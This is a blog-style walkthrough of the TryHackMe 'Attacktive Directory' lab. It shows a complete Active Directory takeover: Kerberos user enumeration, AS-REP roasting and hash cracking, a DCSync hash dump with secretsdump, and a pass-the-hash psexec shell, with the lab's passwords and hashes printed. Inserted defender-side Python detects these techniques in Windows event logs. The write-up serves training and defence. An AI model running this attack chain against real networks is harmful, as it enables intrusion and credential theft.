Attacktive Directory ~ Try Hack Me
Finally completed my CEH Master certification and found myself lazing around so here we go :)
I SUCK AT WINDOWS EXPLOITATION ~ Nee
Prerequisite
Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
echo "10.10.117.127 tar.get" >> /etc/hosts

Okay now onto hacking!
Reconnaissance
As always, I fired off an Nmap scan against the target machine.
┌──(nee㉿kali)-[~]
└─$ nmap -Pn -sV -sC -p- -A tar.get
Nmap scan report for tar.get (10.10.117.127)
Host is up (0.35s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-05 08:45:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2020-10-05T08:48:26+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-10-04T08:35:54
|_Not valid after: 2021-04-05T08:35:54
|_ssl-date: 2020-10-05T08:48:41+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49788/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/5%Time=5F7ADD4A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-10-05T08:48:27
|_ start_date: N/A
Most of the open ports and running services led me to believe that this was indeed a Windows server, most likely an Active Directory domain controller (Kerberos, LDAP and SMB all on the one host):
- DNS
- Active Directory LDAP
- SMB / RPC
- RDP
Bruteforcing credentials
I was given two files, a user list and a password list, that aided with the brute-force attack.
I made use of a tool named kerbrute (its userenum mode) to find which names in the user list are valid accounts on the KDC:
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ ./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.156.245 userlist.txt
Version: v1.0.3 (9dad6e1) - 10/06/20 - Ronnie Flathers @ropnop
2020/10/06 04:49:07 > Using KDC(s):
2020/10/06 04:49:07 > 10.10.156.245:88
2020/10/06 04:49:08 > [+] VALID USERNAME: [email protected]
2020/10/06 04:49:14 > [+] VALID USERNAME: [email protected]
2020/10/06 04:49:22 > [+] VALID USERNAME: [email protected]
2020/10/06 04:49:24 > [+] VALID USERNAME: [email protected]
2020/10/06 04:49:54 > [+] VALID USERNAME: [email protected]
2020/10/06 04:50:13 > [+] VALID USERNAME: [email protected]
2020/10/06 04:50:50 > [+] VALID USERNAME: [email protected]
2020/10/06 04:51:07 > [+] VALID USERNAME: [email protected]
2020/10/06 04:52:58 > [+] VALID USERNAME: [email protected]
2020/10/06 04:53:36 > [+] VALID USERNAME: [email protected]
I was able to find out crucial usernames through this enumeration. Among the valid accounts were:
- svc-admin
- administrator
- backup
I could possibly use one of these accounts to get into the machine.
Exploiting Kerberos
The technique used here is called AS-REP Roasting. I recently learnt about Kerberoasting and it is very similar to this one. The difference that matters here is that AS-REP Roasting targets user accounts that have the "Do not require Kerberos preauthentication" account option set. This means the account does not have to prove its identity (normally with an encrypted timestamp) before the KDC issues it a ticket, so anyone can request an AS-REP for that account and crack the portion encrypted with the user's password-derived key offline.
I performed this with Impacket's GetNPUsers.py (Impacket/Examples/GetNPUsers.py):
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc-admin
[email protected]:80f4807ece8bed030287d392722808dd$148464892db58fe257006835567004e0f3f2a856a4608a1cbce3d858251acfe7c41cf80c1d7ec54b0edad691871910c17564afd893c2cc534e88ab8b6b873e4eee228fcf947ede842452747e0fbdaf55ab1c475cceed283d48ddc5aa604ed8ee8ed8727b3b62f77f634c6e09ff719a53246356edef39f2fb8084b014c1fce8478079a956ce5384d5d1d7121b7173297e8a84e3c4914fd7c6d6618a9221cf3c96280c6ddea7f0ddba1541583bbbfc92b57fc1bd22011a7fd70477c6fd8daccc5d0cd88973a5c0607430e652113642a6de607617dd6866568fcad894ab9364902fd1c7670a7dfa1977ae02d62ff1c2593b35e0
I was presented with the AS-REP hash for the user account. I then just had to crack it with John the Ripper and retrieve the password for that particular account. This is where the password list I was given at the beginning came in handy!
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ sudo john hash.txt --wordlist=passwordlist.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
management2005 ([email protected])
1g 0:00:00:00 DONE (2020-10-06 05:15) 100.0g/s 665600p/s 665600c/s 665600C/s horoscope..amy123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Upon completion I got the password management2005 for the user account [email protected].
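As an added, defender-side example that is not part of the original write-up: both the kerbrute user enumeration and the AS-REP roast above leave traces in Windows Security event 4768 (Kerberos TGT requested) on the domain controller. The Python below triages such records using the event's real field names; the records themselves (EVENTS, the addresses, the usernames) are constructed for the demonstration.

```python
# Added example, not part of the original write-up: triage of Windows Security
# event 4768 (Kerberos TGT requested) records to spot the two techniques above.
# Field names follow the 4768 event XML; the sample records are constructed.
from collections import Counter

ATTACKER, CLIENT = "10.10.14.5", "10.10.20.7"   # constructed addresses

EVENTS = [
    # Success without pre-auth and with RC4 (etype 0x17): an AS-REP roastable
    # account, the same thing GetNPUsers.py harvested for svc-admin.
    {"TargetUserName": "svc-admin", "IpAddress": ATTACKER, "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Normal logon: timestamp pre-auth (type 2) and AES256 (etype 0x12).
    {"TargetUserName": "james", "IpAddress": CLIENT, "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
] + [
    # Username guessing: every non-existent name yields a 4768 failure with
    # status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) and etype 0xffffffff.
    {"TargetUserName": name, "IpAddress": ATTACKER, "PreAuthType": "-",
     "TicketEncryptionType": "0xffffffff", "Status": "0x6"}
    for name in ("alice", "bob", "carol", "dave", "erin", "frank")
]

def asrep_roast_candidates(events):
    """(user, etype) for TGTs that were issued with no pre-authentication at
    all; these accounts need the 'Do not require preauthentication' option
    removed (or a long random password) rather than a log entry."""
    return sorted({(e["TargetUserName"], e["TicketEncryptionType"])
                   for e in events
                   if e["Status"] == "0x0" and e["PreAuthType"] == "0"})

def enumeration_sources(events, threshold=5):
    """Client addresses with at least `threshold` unknown-principal failures,
    the footprint kerbrute userenum leaves for every name not in the domain."""
    unknown = Counter(e["IpAddress"] for e in events if e["Status"] == "0x6")
    return {ip: n for ip, n in unknown.items() if n >= threshold}
```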
Connecting to shares via admin account
Now that I had both the username and the password, I used smbclient to list the file shares the machine offered:
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ smbclient -L spookysec.local -U svc-admin
Enter WORKGROUP\svc-admin's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Now that I had verified that I could access the shares, I tried accessing the backup share:
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ smbclient \\\\10.10.156.245\\backup -U svc-admin
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 15:08:39 2020
.. D 0 Sat Apr 4 15:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 5269051 blocks available
smb: \>
I was able to successfully connect to the share and noticed a file named backup_credentials.txt. I downloaded the file to my local machine and realized that its content was base64 encoded.
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> ^C
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ ls
backup_credentials.txt hash.txt kerbrute_linux_amd64 passwordlist.txt userlist.txt
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
After decoding it, I realized that I had credentials for the backup account found a couple of steps ago: backup@spookysec.local:backup2517860.

Dumping hashes
Using the credentials recovered in the previous step, I used Impacket again, this time secretsdump.py, to dump every domain account's NTLM hash and Kerberos keys. The first attempt failed because spookysec.local does not resolve on my machine (only tar.get is in /etc/hosts), so I pointed the tool at the IP directly and added -just-dc to pull only the domain credentials from NTDS.DIT via DRSUAPI replication, which the backup account turned out to be allowed to do:
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ secretsdump.py spookysec.local/backup:'backup2517860'
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: [Errno Connection error (spookysec.local/backup:backup2517860:445)] [Errno -2] Name or service not known
[*] Cleaning up...
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ secretsdump.py spookysec.local/backup:'backup2517860'@10.10.156.245 -just-dc
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b:::
[*] Cleaning up...
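An added example, not from the write-up or from Impacket: the DRSUAPI replication that secretsdump.py -just-dc performs is recorded on the domain controller as Security event 4662 with the directory-replication extended rights in its Properties field. The detection below matches those rights for accounts that are not machine accounts; the GUIDs are the real extended-right GUIDs, while the events (EVENTS_4662) and the trusted allowlist are constructed for the demonstration.

```python
# Added example, not part of the original write-up: flag DCSync-style
# replication by ordinary accounts in Windows Security event 4662 records.
# The GUIDs are the real extended-right GUIDs; the sample events are constructed.
import re

# Extended rights that grant directory replication; a principal that exercises
# them can pull every NTDS.DIT secret, which is what secretsdump.py -just-dc did.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.I)

# Constructed 4662 events; Properties holds the access GUIDs that were exercised.
EVENTS_4662 = [
    {"SubjectUserName": "backup", "SubjectDomainName": "THM-AD",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "ATTACKTIVEDIREC$", "SubjectDomainName": "THM-AD",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "james", "SubjectDomainName": "THM-AD",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},  # placeholder, unrelated right
]

def dcsync_suspects(events, trusted=()):
    """Return (account, [rights]) for accounts that exercised replication rights
    and are neither a machine account (name ends in '$') nor on the caller's
    allowlist of legitimate replicators (e.g. a directory sync service account).
    Skipping every '$' account is a simplification: a production rule should
    compare against the actual list of domain controllers instead."""
    hits = []
    for e in events:
        user = e["SubjectUserName"]
        if user.endswith("$") or user in trusted:
            continue
        rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(e["Properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        if rights:
            hits.append((user, rights))
    return hits
```

The backup account in the output above would be the single hit here, which is the finding a defender would act on: an ordinary account holding replication rights on the domain object.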
Accessing administrator account of the machine
Lastly, I used Impacket's psexec.py to perform a pass-the-hash with the Administrator NTLM hash from the dump and get a shell as the admin account:
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.156.245.....
[*] Found writable share ADMIN$
[*] Uploading file xLRsIsYU.exe
[*] Opening SVCManager on 10.10.156.245.....
[*] Creating service dfyb on 10.10.156.245.....
[*] Starting service dfyb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
And...I'm in.
That's the end of that box 😩. One of my first Windows boxes! But it turned out to be not too bad, I guess :)